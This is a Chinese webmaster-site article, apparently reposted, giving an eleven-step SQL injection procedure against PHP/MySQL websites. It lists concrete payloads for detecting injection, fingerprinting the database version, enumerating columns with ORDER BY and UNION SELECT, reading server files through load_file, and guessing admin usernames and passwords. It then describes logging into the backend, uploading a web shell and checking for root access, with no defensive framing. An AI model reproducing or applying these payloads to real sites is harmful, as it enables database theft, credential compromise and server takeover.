請登錄后使用快捷導(dǎo)航
沒有帳號？立即注冊

php注入基本步驟小結(jié)

2022-9-26 14:43| 查看: 2074 |來源: 互聯(lián)網(wǎng)

php注入十點基本步驟 1、判斷是否存在注入，加'、and 1=1、and 1=2 2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本，可以用union查詢 3、利用order by 暴字段，在網(wǎng)址后加 order by 10/*

php注入十點基本步驟

1、判斷是否存在注入，加'、and 1=1、and 1=2

2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本，可以用union查詢

3、利用order by 暴字段，在網(wǎng)址后加 order by 10/* 如果返回正常說明字段大于10

4、再利用union來查詢準(zhǔn)確字段，如: and 1=2 union select 1,2,3,......./* 直到返回正常報出數(shù)字，說明猜到準(zhǔn)確字段數(shù)。如過濾了空格可以用/**/代替。

（可在分別用user()、database()、version()進(jìn)行替換報出的數(shù)字進(jìn)而查看信息）

5、判斷數(shù)據(jù)庫連接帳號有沒有寫權(quán)限，and (select count(*) from mysql.user)>0/* 如果結(jié)果返回錯誤，那我們只能猜解管理員帳號和密碼了。

6、如果返回正常，則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值，用逗號隔開)),8,9,10 /* 注：load_file(char(文件路徑的ascii值，用逗號隔開))也可以用十六進(jìn)制，通過這種方式讀取配置文件，找到數(shù)據(jù)庫連接等。

7、首先猜解user表，如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常，說明存在這個表。

8、知道了表就猜解字段，and 1=2 union select 1,username,3,4,5,6....from user/* 按報出的數(shù)字進(jìn)行替換

9、同理再猜解password字段，猜解成功再找后臺登錄。

10、登錄后臺，上傳shell。

11、檢測是不是root權(quán)限 and/**/ord(mid(user(),1,1))=114/*

本文最后更新于 2022-9-26 14:43，某些文章具有時效性，若有錯誤或已失效，請在網(wǎng)站留言或聯(lián)系站長：17tui@17tui.com

·END·

站長網(wǎng)微信號：w17tui，關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明：本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集，旨在傳播知識，文章和圖片版權(quán)歸原作者及原出處所有，僅供學(xué)習(xí)與參考，請勿用于商業(yè)用途，如果損害了您的權(quán)利，請聯(lián)系我們及時修正或刪除。謝謝！

下一篇：upfile asp文件上傳，又一奇跡般的突破上一篇：Ecshop后臺拿shell方法總結(jié)

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域，為您提供最新最全的互聯(lián)網(wǎng)資訊，幫助站長轉(zhuǎn)型升級，為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù)，與站長一起進(jìn)步！讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨！

掃一掃，關(guān)注站長網(wǎng)微信

精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

php注入基本步驟小結(jié)

大家都在看

相關(guān)分類

熱門排行

最近更新